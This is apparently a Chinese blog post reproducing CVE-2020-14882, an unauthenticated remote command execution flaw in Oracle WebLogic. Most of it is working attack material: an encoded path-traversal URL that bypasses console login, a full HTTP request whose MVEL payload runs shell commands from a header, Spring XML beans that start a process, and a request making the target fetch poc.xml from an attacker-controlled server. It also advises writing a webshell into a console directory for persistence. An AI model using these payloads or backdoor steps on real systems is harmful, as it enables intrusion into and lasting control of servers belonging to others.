weblogic未授权访问命令执行复现(cve-2020-14882)

最近的weblogic漏洞很火,直接上手复现一波。也踩了很多坑,比如用docker搭建环境的时候,用不回显payload的话,如何执行命令(所以用有回显的payload是最舒服的最直观的)


漏洞版本主要影响到
Oracle WebLogic Server
版本10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。


版本12.2.1.3

先执行下现有的payload,可以直接未授权面板
ip/console/images/%252E%252E%252Fconsole.portal
即可绕过认证,并且功能点都能正常使用

weblogic未授权访问命令执行复现(cve-2020-14882)_第1张图片

Burpsuit抓到认证绕过成功的包,因为用的是linux的环境,直接打payload
weblogic未授权访问命令执行复现(cve-2020-14882)_第2张图片

成功回显! 回显payload如下

GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') HTTP/1.1
Host: ip:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
cmd:whoami && pwd 
Cookie: ADMINCONSOLESESSION=7TYJfd2GLFY022Mk1qq8TLF1nXT3syN1dLLpVJChQZ5PvvpwgchC!1628279398
Upgrade-Insecure-Requests: 1

weblogic未授权访问命令执行复现(cve-2020-14882)_第3张图片

可以在该目录写入网站后门作为维持权限
/wlserver/server/lib/consoleapp/webapp/images
例如
weblogic未授权访问命令执行复现(cve-2020-14882)_第4张图片

实战的时候最好先看清楚命令执行当前所在目录
user_projects/domains/base_domain
weblogic未授权访问命令执行复现(cve-2020-14882)_第5张图片


版本10.3.6.0

如果是10版本的话,可以参考
https://github.com/jas502n/CVE-2020-14882/blob/main/README.md
大概思路就是服务器起远程xml文件,进行一个远程的命令执行。

windows

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmdvalue>
        <value>/cvalue>
        <value>value>
      list>
    constructor-arg>
  bean>
beans>

linux

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/bashvalue>
        <value>-cvalue>
        <value>value>
      list>
    constructor-arg>
  bean>
beans>

漏洞请求包

POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: ip:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext("http://服务器ip:端口/poc.xml")

如果用12版本的payload去打未授权,页面会出现报错情况
weblogic未授权访问命令执行复现(cve-2020-14882)_第6张图片

你可能感兴趣的:(复现漏洞,weblogic,CVE2020-14882)